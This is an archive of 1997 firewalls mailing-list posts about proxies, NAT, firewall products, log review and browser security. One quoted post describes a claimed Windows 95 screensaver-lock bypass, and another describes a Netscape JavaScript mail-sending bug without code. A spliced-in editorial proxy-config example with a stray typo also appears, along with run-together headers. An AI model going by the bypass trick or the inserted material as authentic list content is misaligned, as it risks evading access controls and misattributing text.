Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA12066 for firewalls-outgoing; Wed, 15 Jan 1997 05:19:36 -0800 (PST)
Received: from world1.sdm.de (world1.sdm.de [192.76.162.14]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA12025 for ; Wed, 15 Jan 1997 05:18:37 -0800 (PST)
Received: by world1.sdm.de (SMTP gateway) id OAA03324; Wed, 15 Jan 1997 14:17:03 +0100
Received: by world1.sdm.de (SMTP security proxy) via SMTP from bsdti1.sdm.de id spool003322; Wed Jan 15 14:17:02 1997
Received: from localhost (pichel@localhost) by bsdti1.sdm.de (8.8.0/8.7.3) with SMTP id OAA28775 for ; Wed, 15 Jan 1997 14:09:03 +0100 (MET)
Date: Wed, 15 Jan 1997 14:09:03 +0100 (MET)
From: Joerg Pichel
To: firewalls@greatcircle.com
Subject: Re: Firewall-1 query
In-Reply-To: <4825641F.00052211.00@mta2.lotus.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 14 Jan 1997 Martin_Khoo/SIN/Lotus%LOTUSINT@crd.lotus.com wrote:

> TIS Gauntlet has a SMTP proxy (SMPAD) that you may want to take a look.

smtpd (www.optuse.com) seems to be a little better (logging etc.) and can be used under the GNU license!

J"org!

--
J"org Pichel                    |s |d &|m |
software design & management    |  |  |  |
GmbH & Co. KG                   |  |  |  |
Thomas-Dehler-Str. 27           joerg.pichel@sdm.de
81737 Muenchen                  Tel/FAX: (089) 63812-112/150

From firewalls-owner Wed Jan 15 20:12:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20512 for firewalls-outgoing; Wed, 15 Jan 1997 08:08:36 -0800 (PST)
Received: from hp01.vak12ed.edu (hp01.vak12ed.edu [141.104.150.251]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA20491 for ; Wed, 15 Jan 1997 08:08:22 -0800 (PST)
Message-Id: <199701151608.IAA20491@miles.greatcircle.com>
Received: by hp01.vak12ed.edu (1.37.109.20/16.2) id AA257264348; Wed, 15 Jan 1997 11:05:48 -0500
From: "W.C. Epperson"
Subject: RE: WIN95 FLAW
To: firewalls@greatcircle.com
Date: Wed, 15 Jan 1997 11:05:48 EST
Cc: frank@mail.rignhaave.nl
Reply-To: epperson@vak12ed.edu
X-Mailer: Elm [revision: 109.18]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Pardon me if this is off topic, but what in the &*@##$@((&% does this have to do with firewalls? Frank and some other folks have been blathering (some using undeliverable return addresses):

> Hi,
>
> I use the 400.950 UK version of win95
>
> >If the Windows'95 Screen saver is active, you can break in without any
> >password and all you have to do is: press the "windows" logo key (printed
> >on the M$ keyboard) and there you are.
>
> This works only with third-party screensavers for me. The 'flying windows'
> one only responds with the password dialog box.
>
> >If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> >tried this with my own PC and my friends. It works..... try on your own PC.
>
[blah, blah, blah, blah, blah]

--
W.C. Epperson                    "I have great faith in fools.
Senior SE                         Self-confidence, my friends call it."
Information Security Officer               --Edgar Allan Poe--
DBA Emeritus
Curmudgeon-for-Life
Virginia Dept. of Education
epperson@pen.k12.va.us

From firewalls-owner Wed Jan 15 20:43:31 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA12123 for firewalls-outgoing; Wed, 15 Jan 1997 05:20:39 -0800 (PST)
Received: from charon-1.shell.nl (charon-1.shell.nl [192.87.147.99]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA12054 for ; Wed, 15 Jan 1997 05:18:59 -0800 (PST)
Received: (from uucp@localhost) by charon-1.shell.nl (8.8.3/8.8.3) id OAA18938; Wed, 15 Jan 1997 14:17:53 +0100 (MET)
Received: from kseu06.siep.shell.com(145.6.200.51) by charon-1.shell.nl via smap (3.2) id xma018864; Wed, 15 Jan 97 14:17:34 +0100
Received: from voyager.ksepl.shell.nl by kseu06.ksepl.shell.nl with SMTP (1.38.193.5/16.2-NCE/JvdW) id AA16920; Wed, 15 Jan 1997 14:19:20 +0100
Message-Id: <32DCD9ED.773C@siep.shell.com>
Date: Wed, 15 Jan 1997 14:21:49 +0100
From: Fred Donck
Organization: Shell International Exploration and Production B.V.
X-Mailer: Mozilla 3.0 (X11; I; IRIX 5.3 IP22)
Mime-Version: 1.0
To: PaLaN
Cc: firewalls@GreatCircle.COM
Subject: Re: WIN'95 FLAW
References: <3.0.32.19970114145623.006882b0@202.190.59.4>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

PaLaN,

I've tried this on Windoze95 and on NT4.0 (incl SP2) without luck. Machines used were Compaq with normal (US) keyboards.

Later,
Fred

PaLaN wrote:
>
> Howdy,
>
> I just encountered a security (I would call it) flaw in M$ Windows'95
> screensaver!! I don't know if any of you encountered this or not but here
> it goes:
>
> If the Windows'95 Screen saver is active, you can break in without any
> password and all you have to do is: press the "windows" logo key (printed
> on the M$ keyboard) and there you are.
>
> If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> tried this with my own PC and my friends. It works..... try on your own PC.
>
> Hmmm.... M$ still the "King Of Buggy" err... I don't intend to flame M$ here
> ok..! Let me know if any of you encountered this.
>
> I'm going to send M$ a mail on this bug but before that, I need to know
> whether any patch is available for this... thx.
>
> rgds,
> PaLaN

--
Fred Donck                         Tel: +31 70 311 2374
Unix System Engineer               Mobile: +31 654 666 488
Internet/Intranet infrastructure   Fax: +31 70 311 2166
E-mail: f.c.w.donck@siep.shell.com / fred@patriots.net

From firewalls-owner Wed Jan 15 20:50:23 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA22460 for firewalls-outgoing; Wed, 15 Jan 1997 08:47:55 -0800 (PST)
Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA22449 for ; Wed, 15 Jan 1997 08:47:40 -0800 (PST)
From: gblolmxb@ibmmail.com
Message-Id: <199701151647.IAA22449@miles.greatcircle.com>
Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 4586; Wed, 15 Jan 97 11:46:22 EST
Date: Wed, 15 Jan 1997 11:45:45 EST
To: firewalls@greatcircle.com
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Subject: RE NT or UNIX
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Nik wrote:

>Hi All,
>I am a Master's student in Comp. Sc. and my master's project is the
>design and implementation of a firewall. The basic question ahead of
>me is whether to implement the firewall on NT or on Unix.
>Now, I don't know the advantages / pitfalls of either approach and
>since this is just a project my school doesn't care.
>But, all the discussions I hear on this mailing list are mainly about
>Unix firewalls and all the books talk about Unix only. Does that mean
>that it is tough to get any material to build Unix software. Also is
>it easier to do it on Unix since everything is so easily available.
>I would greatly appreciate any advice that people would have.
I would not claim to be an expert on NT or UNIX, but when I was evaluating potential firewalls (which obviously includes hardware, OS & the firewall s/w) I came to a few conclusions.

1. A firewall system will be most vulnerable at its weakest point, hence the physical security of the box is just as important as how many bells & whistles the firewall software has.

2. I bow to the superior knowledge of security experts, and value their collective opinions - they can only (or rather should!) reach these opinions by examining the components that make up the firewall. This is where (in my opinion) the big difference between UNIX & NT arises. UNIX has been used, abused, taken apart and rebuilt by a wide range of people over a long period of time; in its infancy people were encouraged to do so. NT is a proprietary system which, quite rightly for commercial reasons, has not been subject to such independent examination. We can only take Microsoft's word that it is a stable OS with no hidden holes, and I'm afraid Microsoft do not have a good history of being completely honest and open in the past.

3. A firewall system is not a static object - users' needs change. At the moment, UNIX based systems offer far more mix and match than those running under NT.

4. The networking and OS experience required to properly configure and then monitor a Firewall system is mostly found in the UNIX arena - there are far more people available with the correct skill sets with UNIX knowledge than NT.

At the end of the day I had to make a professional judgement, one which helps me sleep most easily at night. I had the security of 60+ organisations' networks to consider, and so went for a UNIX based solution (for info, IBM's SNG software running under AIX on a RS6000 - and no, I do not have blue blood!)

Mark.
From firewalls-owner Wed Jan 15 20:55:16 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA25116 for firewalls-outgoing; Wed, 15 Jan 1997 09:22:36 -0800 (PST)
Received: from sunrise (sunrise.solmelia.es [194.179.70.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA25076 for ; Wed, 15 Jan 1997 09:22:01 -0800 (PST)
Received: from (firewall) by sunrise (5.x/SMI-SVR4) id AA06425; Wed, 15 Jan 1997 18:22:57 +0100
Message-Id: <9701151722.AA06425@sunrise>
From: israel.serrano@solmelia.es
Date: Wed, 15 Jan 97 18:13:39
To: Firewalls
Subject: IP translation
X-Mailer:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all. Just a little question. Can Cisco Routers also serve as an address translation box? I know it can act as a packet filter (with extended access lists) but I need it to translate addresses on one interface to other ones on the other interface. Thanx.

Luis Israel Serrano Barge
Departamento de Sistemas de Información / Information Technology Department
Sol Meliá (http://www.solmelia.es)
email: israel.serrano@solmelia.es
Tlf: +34 (9)71 43 70 57 Fax: +34 (9)71 43 70 52

From firewalls-owner Wed Jan 15 21:10:57 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18376 for firewalls-outgoing; Wed, 15 Jan 1997 07:29:51 -0800 (PST)
Received: from portal.usfg.com (portal.usfg.com [208.201.108.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA18347 for ; Wed, 15 Jan 1997 07:29:30 -0800 (PST)
From: Dennis_Gnatowski@USFG.COM
Received: by portal.usfg.com; id KAA27324; Wed, 15 Jan 1997 10:27:09 -0500 (EST)
Received: from usfg-notes-smtp.usfg.com(170.202.29.31) by portal.usfg.com via smap (V3.1.1) id xma027319; Wed, 15 Jan 97 10:26:58 -0500
Received: by USFG-NOTES-SMTP.USFG.COM(Lotus SMTP MTA v1.01.02 (238.7 10-8-1996)) id 85256420.005503A3 ; Wed, 15 Jan 1997 10:28:34 -0400
X-Lotus-FromDomain: USFG
To: firewalls@GreatCircle.COM
Message-ID:
<85256420:00547FF0.00@USFG-NOTES-SMTP.USFG.COM>
Date: Wed, 15 Jan 1997 10:27:47 -0400
Subject: Firewall as sniffer
Mime-Version: 1.0
Content-type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What security issues arise if one were to install/run a "sniffer" type program on the firewall, or is there a better way to record/capture for analysis all traffic that hits the firewall? Is it better to put a separate sniffer or probe on the unsecure network, but then how do you monitor or access the unit through the firewall?

-Dennis Gnatowski
dennis_gnatowski@usfg.com

From firewalls-owner Wed Jan 15 21:55:14 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA00186 for firewalls-outgoing; Wed, 15 Jan 1997 16:25:49 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA28198 for ; Wed, 15 Jan 1997 10:06:42 -0800 (PST)
Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id KAA00451; Wed, 15 Jan 1997 10:05:29 -0800 (PST)
Message-Id: <3.0.32.19970115130527.006c5330@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Wed, 15 Jan 1997 13:05:29 -0500
To: Bertrum Carroll
From: Paul Ferguson
Subject: Re: wading in syslog files
Cc: Firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/enriched; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

perl?

- paul

At 10:55 AM 1/14/97 -0600, Bertrum Carroll wrote:
>>>> Does anybody know of an app to review large syslog files for trouble spots?

bc17684@90.deere.com
BEGIN:VCARD
FN:Bertrum Carroll
N:Carroll;Bertrum
EMAIL;INTERNET:bc17684@90.deere.com
NOTE:Deere & Company Computer Security
X-NAV-HTML:T
END:VCARD

--
Paul Ferguson || ||
Consulting Engineering || ||
Herndon, Virginia USA |||| ||||
tel: +1.703.397.5938 ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 15 22:03:05 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA24875 for firewalls-outgoing; Wed, 15 Jan 1997 09:20:03 -0800 (PST) Received: from Relay1.Austria.EU.net (Relay1.Austria.EU.net [193.154.160.101]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA24824 for ; Wed, 15 Jan 1997 09:19:26 -0800 (PST) Received: from mmfw ([193.154.155.10]) by Relay1.Austria.EU.net with SMTP id AA22585 (5.67b/IDA-1.5 for ); Wed, 15 Jan 1997 18:18:08 +0100 Received: from OC_3 ([195.5.57.10]) by mmfw via smtpd (for Relay1.Austria.EU.net [193.154.160.101]) with SMTP; 15 Jan 1997 17:18:29 UT Received: by maxmobil.at(Lotus SMTP MTA 188.1 7-27-1996) id C1256420.006499CE ; Wed, 15 Jan 1997 19:18:49 +0200 X-Lotus-Fromdomain: MAXMOBIL_AT From: "Martin Hein" To: Firewalls@GreatCircle.com Message-Id: Date: Wed, 15 Jan 1997 19:18:39 +0200 Subject: LotusNotes and Oracle behind the firewall Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi folks, at my local site I have to setup an intranet supporting both LotusNotes and Oracle DBs which have to be accessed from the outside across a firewall as well as the outside from appropriate DB applications. One topic is a point-of-sales application, consisting of a LotusNotes-client located at our reseller/distributor sites (outside the firewall) and a LotusNotes DB behind the firewall. Is it possible to lead all this modem traffic across the firewall or do I have to ignore my safe-keeper and access the LotusNotes server directly? 
Martin

From firewalls-owner Wed Jan 15 22:31:00 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA25619 for firewalls-outgoing; Wed, 15 Jan 1997 09:30:46 -0800 (PST)
Received: from trex.centroin.com.br (trex.centroin.com.br [200.255.215.253]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA25527 for ; Wed, 15 Jan 1997 09:29:04 -0800 (PST)
Received: from jerusalem (du79.centroin.com.br [200.255.215.79]) by trex.centroin.com.br (8.6.12/8.6.12) with ESMTP id PAA05369; Wed, 15 Jan 1997 15:21:51 -0200
Message-ID: <32DD12C4.38CE@centroin.com.br>
Date: Wed, 15 Jan 1997 15:24:21 -0200
From: Alessandro Coelho Ribeiro
Reply-To: sandro@centroin.com.br
Organization: ACR97
X-Sender: Alessandro Coelho Ribeiro
X-Mailer: Mozilla 4.0b1 (WinNT; I)
MIME-Version: 1.0
To: Pilar Lavin Mera
CC: firewalls-digest@GreatCircle.COM
Subject: Re: TIS FWtk + netscape
X-Priority: Normal
References: <199701141055.LAA08506@hydra.crisa.es>
Content-Type: multipart/alternative; boundary="----------45BA18D63DC11"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Pilar Lavin Mera wrote:
> My company has a network acceeding to internet through a SUN Sparc Station + Solaris 2.3 and we have installed the TIS FWtoolkit.
> Our problem is that we cannot configure netscape to pass through the ftp-proxy.
> Can anyone help us?

You cannot configure netscape to pass through the ftp-proxy. You should configure it to use the http-proxy for ftp. The same applies for gopher proxying. The ftp proxy that comes with TIS is (that's what I think) to be used only with command-style ftp clients.

Alessandro Coelho Ribeiro
(sandro@centroin.com.br,sandro@acm.org)
 
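As an added illustration of the configuration advised in the reply above (this is not code from the list or from TIS), here is a Netscape proxy auto-config file that does what the reply describes: ftp:, gopher: and http: URLs for external hosts are sent to the FWTK http-gw on the firewall, nothing is pointed at the ftp-gw, and internal hosts are reached directly. The firewall name fw.example.com, the http-gw port 8080 and the internal domain .example.com are assumed placeholders; the two helper functions are local stand-ins for the PAC built-ins of the same name, written out so that the file also runs under an ordinary JavaScript engine.

```javascript
// Added example (not the list's or TIS's own code): a Netscape proxy
// auto-config (PAC) file that sends FTP and Gopper... FTP and Gopher
// requests through the FWTK http-gw rather than the ftp-gw.
// fw.example.com:8080 and the .example.com internal domain are placeholders.
var HTTP_GW = "PROXY fw.example.com:8080";   // FWTK http-gw on the firewall (assumed port)
var INTERNAL_DOMAIN = ".example.com";        // hosts reached without the firewall (assumed)

// Stand-ins for the PAC built-ins of the same name, so the file behaves
// identically inside Navigator and under a plain JavaScript engine.
function isPlainHostName(host) {
  return host.indexOf(".") == -1;
}
function dnsDomainIs(host, domain) {
  return host.length >= domain.length &&
         host.substring(host.length - domain.length) == domain;
}

// Navigator calls this for every URL and follows the returned directive.
function FindProxyForURL(url, host) {
  var scheme = url.substring(0, url.indexOf(":")).toLowerCase();

  // Internal hosts: never hand these to the firewall.
  if (isPlainHostName(host) || dnsDomainIs(host, INTERNAL_DOMAIN)) {
    return "DIRECT";
  }

  // Everything http-gw can carry goes through it, including ftp:// URLs
  // (anonymous FTP fetched over HTTP) and gopher://, as the reply advises.
  if (scheme == "http" || scheme == "ftp" || scheme == "gopher") {
    return HTTP_GW;
  }

  // Other schemes are not covered by this configuration.
  return "DIRECT";
}
```

Navigator loads the file from the Automatic Proxy Configuration URL on the Proxies tab of Network Preferences; the same routing can be entered by hand by putting the http-gw host and port into the FTP and Gopher proxy fields of the manual proxy configuration. Keeping the decision in one PAC file means a change of firewall host or port is made once, not on every desktop.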
From firewalls-owner Wed Jan 15 22:57:56 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA27328 for firewalls-outgoing; Wed, 15 Jan 1997 09:54:30 -0800 (PST)
Received: from cs.sandia.gov (cs.sandia.gov [132.175.13.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA27280 for ; Wed, 15 Jan 1997 09:53:57 -0800 (PST)
Received: from work.cs.sandia.gov.noname by cs.sandia.gov with smtp (Smail3.1.28.1 #5) id m0vkZW9-000XWFC; Wed, 15 Jan 97 10:52 MST
Received: by work.cs.sandia.gov.noname (4.1/SMI-4.1) id AA07592; Wed, 15 Jan 97 10:52:54 MST
Date: Wed, 15 Jan 97 10:52:54 MST
From: mccurley@cs.sandia.gov (Kevin S. McCurley)
Message-Id: <9701151752.AA07592@work.cs.sandia.gov.noname>
To: firewalls@greatcircle.com
Subject: blocking javascript
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Many sites have been waffling on the subject of blocking javascript embedded in HTTP coming through their firewall. Unfortunately, I recently discovered a javascript bug in Netscape that allows web pages to trigger a browser to send mail without knowledge of the user. This mail can be directed against a site that is collecting email addresses, or perhaps worse - against an address like root@localhost. Your SMTP filter may block dangerous email, but then it comes through web pages.

Note also that such javascript can be embedded inside SMTP messages, and the Netscape mail tool will execute the javascript as long as javascript is turned on in the browser. Thus it becomes important to filter mail as well as HTTP. This is less difficult due to the offline nature of email.

A demonstration of the problem is given at http://www.digicrime.com. It apparently affects Netscape 3.0-4.0b1.

Ever since firewalls became commercial shrink-wrap products, I have not kept up with what everyone else is doing.
Blocking Java seems much easier than blocking Javascript, because a java program comes in the form of a separate file from the HTML pages. Finding and deleting Javascript is more of a performance hit, because it requires selectively editing the HTML files coming through your firewall. The alternatives seem to be:

- have a proxy look at the browser type being used inside to check it against a list of "approved browsers". Unfortunately the bug mentioned above affects the browser most likely to be on the list, and when a bug is found you need to have an alternative strategy. A browser such as Netscape 3.0 can be customized to create a corporate version, and I presume that this customization can include turning off javascript permanently. This may become the only accepted browser (yuck).

- have a point of administration for internal browsers that will selectively turn off javascript. I'm not sure what progress is being made in this direction by vendors, and the hodgepodge of machines inside corporate firewalls makes this questionable.

It's too bad that it comes to this. The promise of the web is being constantly broken by a flood of poorly thought out innovation.
Kevin McCurley Sandia National Laboratories From firewalls-owner Wed Jan 15 23:10:43 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14474 for firewalls-outgoing; Wed, 15 Jan 1997 06:04:59 -0800 (PST) Received: from PROMETHEUS.ADVSTAFF.COM ([205.136.148.15]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA14431 for ; Wed, 15 Jan 1997 06:04:31 -0800 (PST) From: mgetter@advstaff.com Received: by PROMETHEUS.ADVSTAFF.COM; id IAA17990; Wed, 15 Jan 1997 08:55:10 -0500 (EST) Received: from st-notes01.advstaff.com(192.168.100.25) by prometheus.advstaff.com via smap (3.2) id xma017971; Wed, 15 Jan 97 08:54:56 -0500 Received: by st-notes01.advstaff.com(Lotus SMTP MTA v1.05 (274.9 11-27-1996)) id 85256420.004D1A25 ; Wed, 15 Jan 1997 09:02:09 -0400 X-Lotus-FromDomain: ADVANTAGE To: firewalls@GreatCircle.COM Message-ID: <85256420.004CE160.00@st-notes01.advstaff.com> Date: Wed, 15 Jan 1997 09:02:03 -0400 Subject: Access Reporting Mime-Version: 1.0 Content-type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for a product that will allow me to monitor and report more thoroughly on who is going where through our firewall. Any ideas would be appreciated. 
Thank You Marc From firewalls-owner Wed Jan 15 23:11:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15016 for firewalls-outgoing; Wed, 15 Jan 1997 06:19:18 -0800 (PST) Received: from dol.gov (BUBBA.DOL.GOV [166.96.254.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA14988 for ; Wed, 15 Jan 1997 06:18:52 -0800 (PST) Received: by dol.gov (5.x/SMI-SVR4) id AA12334; Wed, 15 Jan 1997 09:15:28 -0500 Received: from smtpgw(166.96.2.20) by gatekeeper via smap (V1.3) id sma012244; Wed Jan 15 09:15:07 1997 Received: by gatekeeper with Microsoft Mail id <32DCA0AC@gatekeeper>; Wed, 15 Jan 97 09:17:32 EST From: Alexander Don W To: firewalls Subject: Eagle Raptor Date: Wed, 15 Jan 97 08:48:00 EST Message-Id: <32DCA0AC@gatekeeper> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm reviewing several firewall products one of them being Eagle by Raptor Systems, Inc. Is there anyone out there familiar with this product? If so, I would appreciate any comments that you may have. Also, if there are any other NT based firewall products that you know are worth taking a look at, please let me know. Thanks. -Don W. Alexander dwalexan@dol.gov From firewalls-owner Wed Jan 15 23:20:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA16952 for firewalls-outgoing; Wed, 15 Jan 1997 07:02:04 -0800 (PST) Received: from bernie.compusmart.ab.ca (bernie.compusmart.ab.ca [199.185.130.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA16931 for ; Wed, 15 Jan 1997 07:01:46 -0800 (PST) Received: from INTREPID (remote257.compusmart.ab.ca [206.75.84.82]) by bernie.compusmart.ab.ca (8.7.4/8.6.5) with SMTP id IAA17604; Wed, 15 Jan 1997 08:42:38 -0700 (MST) Message-ID: <32DCF152.5835@compusmart.ab.ca> Date: Wed, 15 Jan 1997 08:01:38 -0700 From: Bob Russell Reply-To: caeits@compusmart.ab.ca Organization: CAE Aviation Ltd. 
X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.com Subject: NEC's PrivateNet Firewall Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm considering using the NEC PrivateNet Firewall to connect 50 users to the Internet. I like the idea of the packaged hardware/software solution. I'd appreciate any comments from the users of this service on this firewall in comparison to other solutions such as Firewall-1 or Gauntlet. Thanks Bob Russell UNIX Sys Admin CAE Aviation Ltd From firewalls-owner Wed Jan 15 23:23:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA05297 for firewalls-outgoing; Wed, 15 Jan 1997 16:58:02 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA01363 for ; Wed, 15 Jan 1997 16:47:42 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA08917; Wed, 15 Jan 1997 14:49:50 -0800 Received: from snake.srv.net(199.104.81.3) by mycroft via smap (V1.3mjr) id sma008915; Wed Jan 15 14:49:15 1997 Received: from ras10.rex.srv.net by snake.srv.net (5.65/1.1.8.2/12May95-0152AM) id AA22721; Wed, 15 Jan 1997 15:48:40 -0700 Message-Id: <32DD5F71.47F1@srv.net> Date: Wed, 15 Jan 1997 15:51:29 -0700 From: "Zippy Ship 'N Copy" X-Mailer: Mozilla 3.0 (Win95; I) Mime-Version: 1.0 To: sneakers@cs.yale.edu Cc: firewalls@GreatCircle.COM Subject: whothehell is rOOt? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't know who in the hell rOOt is, but he's really piss'n me off. Why can't people here stick the damn subject and not try to impress anyone. Anyone else want to know who rOOt is, he's some lamer that needs attention. oo0 Cosmos 0oo H.O.P.E. 
Helping the cause, joining the fight

From firewalls-owner Wed Jan 15 23:26:11 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA05872 for firewalls-outgoing; Wed, 15 Jan 1997 17:05:10 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA01916 for ; Wed, 15 Jan 1997 16:49:09 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA08486; Wed, 15 Jan 1997 14:02:42 -0800
Received: from unknown(198.168.83.167) by mycroft via smap (V1.3mjr) id sma008479; Wed Jan 15 14:01:50 1997
Received: from SLI-Message_Server by SNC-LAVALIN.COM with Novell_GroupWise; Wed, 15 Jan 1997 17:01:53 -0500
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Wed, 15 Jan 1997 16:59:21 -0500
From: Normand Bernier
To: Firewalls@GreatCircle.COM
Subject: Firewalls-Digest V6 #20 -Reply
Mime-Version: 1.0
Content-Type: text/plain
Content-Disposition: inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi people !! I'm French and trying hard. Sorry for mistakes.

My company is willing to give the management of our entire WAN (routers + links) to an external carrier company. My question is: after we installed all those firewalls internally to protect ourselves from the Internet and use complex internal security policies, any ideas on the way to protect our LAN from an outside carrier company that would manage the WAN links? They need access to our routers (telnet, tftp, snmp, etc). Is there any access-list, measures or document that could be used to protect ourselves? Is there any good question I should ask the carrier company to know what they are up to? Or should our trust be given completely to the carrier company?
thank's in advance Normand Bernier From firewalls-owner Wed Jan 15 23:29:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14424 for firewalls-outgoing; Wed, 15 Jan 1997 06:04:30 -0800 (PST) Received: from radmail.rad.co.il (radmail.rad.co.il [192.114.26.219]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA14349 for ; Wed, 15 Jan 1997 06:03:46 -0800 (PST) Received: from radguard.com ([192.114.26.210]) by radmail.rad.co.il (post.office MTA v1.9.3 ID# 0-12126) with SMTP id AAA11544; Wed, 15 Jan 1997 16:05:13 +0200 Received: by radguard.com (4.1/SMI-4.1) id AA29967; Wed, 15 Jan 97 16:03:48 IST Received: from elgamal.radguard.co.il(192.114.33.2) by gatekeeper.radguard.com via smap (V1.3) id sma029963; Wed Jan 15 16:03:45 1997 Received: by elgamal.radguard.com (4.1/SMI-4.1) id AA09232; Wed, 15 Jan 97 16:02:41 IST Date: Wed, 15 Jan 1997 16:02:41 +0200 (IST) From: Dan Frommer To: admin@unicc.org Cc: firewalls@greatcircle.com Subject: Re: Other VPN products In-Reply-To: <9701151034.AA13710@gh-old.unicc.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 15 Jan 1997 admin@unicc.org wrote: > I'm looking for more information on available VPN products. I implemented > AltaVista Tunnel and think it's a good product, but still would like to be > sure that I didn't miss any better offer. > > Did anybody try any other solutions? > > Thanks, Lilia > You might want to look at RADGUARD's CryptoWall (TM). The CryptoWall is a self-contained, "box" security gateway that offers VPN and access control functions. It provides sophisticated key management capabilities and uses hardware acceleration for encryption. CryptoWall devices are securely managed centrally, locally or regionally. Checkout www.radguard.com or info@radguard.com for more details. 
Dan Frommer

From firewalls-owner Wed Jan 15 23:33:00 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14553 for firewalls-outgoing; Wed, 15 Jan 1997 06:06:00 -0800 (PST)
Received: from inetsrv1.inetuk.wang.com (inetsrv1.inetuk.wang.com [193.115.8.97]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA14495 for ; Wed, 15 Jan 1997 06:05:31 -0800 (PST)
Received: from ccmailgw.inetuk.wang.com by inetsrv1.inetuk.wang.com with SMTP (1.38.193.4/16.2) id AA10784; Wed, 15 Jan 97 14:00:16 GMT
